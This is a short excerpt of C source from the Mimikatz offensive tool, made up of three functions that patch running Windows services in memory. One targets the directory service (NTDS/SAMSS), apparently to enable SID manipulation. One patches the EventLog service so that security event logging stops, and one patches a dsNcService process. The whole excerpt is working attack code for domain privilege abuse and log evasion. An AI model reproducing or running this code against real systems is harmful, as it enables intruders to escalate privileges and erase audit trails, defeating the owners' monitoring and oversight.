NTSTATUS kuhl_m_sid_patch(int argc, wchar_t * argv[]) { PCWSTR service, lib; if(MIMIKATZ_NT_BUILD_NUMBER < KULL_M_WIN_MIN_BUILD_VISTA) { service = L"samss"; lib = L"ntdsa.dll"; } else { service = L"ntds"; lib = L"ntdsai.dll"; } kprintf(L"Patch 1/2: "); if(kull_m_patch_genericProcessOrServiceFromBuild(LoopBackCheckReferences, sizeof(LoopBackCheckReferences), service, lib, TRUE)) { kprintf(L"Patch 2/2: "); kull_m_patch_genericProcessOrServiceFromBuild(SysModReservedAttReferences, sizeof(SysModReservedAttReferences), service, lib, TRUE); } return STATUS_SUCCESS; }
NTSTATUS kuhl_m_event_drop(int argc, wchar_t * argv[]) { kull_m_patch_genericProcessOrServiceFromBuild(EventReferences, ARRAYSIZE(EventReferences), L"EventLog", (MIMIKATZ_NT_MAJOR_VERSION < 6) ? L"eventlog.dll" : L"wevtsvc.dll", TRUE); return STATUS_SUCCESS; }
NTSTATUS kuhl_m_misc_ncroutemon(int argc, wchar_t * argv[]) { kull_m_patch_genericProcessOrServiceFromBuild(ncRouteMonitorReferences, sizeof(ncRouteMonitorReferences) / sizeof(KULL_M_PATCH_GENERIC), L"dsNcService", NULL, TRUE); return STATUS_SUCCESS; }